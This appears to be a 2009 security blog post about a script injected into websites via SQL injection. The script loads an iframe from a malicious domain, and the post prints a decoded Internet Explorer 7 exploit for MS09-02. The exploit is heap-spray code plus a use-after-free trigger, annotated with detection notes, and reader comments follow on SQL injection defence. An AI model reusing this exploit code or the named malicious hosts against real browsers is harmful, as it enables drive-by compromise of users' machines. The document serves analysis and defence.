deabak.com/z.js
This is a new script that is being SQL-injected into sites.
z.js contains an iframe that loads www.893500.cn/2/index.htm
The index.htm contains links to several of the typical variety of exploits. One of them, 02.htm, is an MS09-02 exploit.
The IE7 exploit is decoded as follows:
// Decoded malicious script as published on the page, which identifies it as
// the MS09-02 exploit served to IE7 from 02.htm. It is kept verbatim for
// analysis: the blog's typography replaced straight quotes with curly quotes
// and "0x" with "0×", so the listing does not parse as JavaScript as shown.
//
// Detection notes: the "%u0C0C" string is never written whole; it is
// assembled from one-character pieces, presumably so that signatures matching
// the literal do not fire. Matching on the concatenated/decoded form, on
// CollectGarbage() calls and on loops that keep doubling a string is more
// robust than matching the raw text.

// Filler string: unescape() of "%u0C0C%u0C0C", built by concatenation.
var b=unescape(“%”+”u”+”0″+”C”+”0″+”C”+”%”+”u”+”0″+”C”+”0″+”C”);
// Reads yumen before the assignment on the next line; test99 is not used
// again anywhere in the visible listing.
var test99=yumen;
// Array that receives the large strings built below.
var yumen=new Array();
// ttt is not defined anywhere in this listing. Presumably it carries the
// encoded payload with the token "Game" standing in for "%u" ("\x25\x75");
// this line restores the "%u" prefixes and lets unescape() decode the result.
Tameeeeee=unescape(ttt.replace(/Game/g,”\x25\x75″));
// Doubles the filler until it reaches a bound derived from ttt.length, then
// trims it to exactly that bound (lh).
while(b.length<0×100000-(ttt.length*2+0×01020)/2){b+=b}var lh=b.substring(0,0×100000-(ttt.length*2+0×01020)/2);
// Stores 0xC0 (192) copies of filler + decoded content in yumen, the repeated
// large-allocation pattern usually called a heap spray, then requests a
// garbage collection from the script engine.
for(i=0; i<0xC0; i++){yumen[i]=lh+Tameeeeee}CollectGarbage();
// Second string: unescape() of "%u0b0b%u0b0b" followed by a run of "kf" text.
var s1=unescape(“%”+”u”+”0″+”b”+”0″+”b”+”%”+”u”+”0″+”b”+”0″+”b”+”kfkfkfkfkfkfkfkfkfkfkfkfk”);
// 1000 <img> elements held in a1; ok() later assigns s1 to each one's src.
var a1=new Array();
for(var x=0; x<1000; x++)a1.push(document.createElement(“img”));
// Trigger routine from the same decoded sample, kept verbatim (curly quotes
// included). It is only defined here; the listing does not show its caller.
// o1 is assigned without var, so it is an implicit global.
function ok(){o1=document.createElement(“tbody”);
// Bare property reference (no call) on the new element.
o1.click;
// Clone taken before the original element's attributes are cleared.
var o2=o1.cloneNode();
o1.clearAttributes();
// Drops the script's reference to the original element and requests a
// garbage collection.
// NOTE(review): looks like an access-after-release pattern against the clone;
// the page names only the bulletin (MS09-02), not the root cause. Confirm
// against the vendor advisory.
o1=null;
CollectGarbage();
// Assigns s1 to the src of every <img> in a1, then references click on the
// clone. On a system with the bulletin's security update installed this
// sequence should be harmless; unpatched IE7 is the target named by the page.
for(var x=0; x<a1.length; x++)a1[x].src=s1; o2.click}
February 27, 2009 at 3:28 am
Hi, I just got this SQL injection in my database today. Can you tell me how they inject this script? I’ve put code in place for all variables passed through the URL, but I still got this. If you can help, that’ll be great!
Thanks in advance.
Tina
February 27, 2009 at 10:38 pm
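Sanitize and validate all data passed through the URL, cookies and POST data. Filtering alone is easy to get wrong, so also pass those values to the database through parameterized queries instead of building SQL strings from them.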
February 28, 2009 at 2:07 am
Thanks for your response. I have a question: is there any way the hacker can find out all the files in the directory? I’ve put in the code to prevent URL injection, but I have some hidden files, accessible only to registered users, that do not have the protection. So I wonder whether the hacker might have found those pages and attacked from there.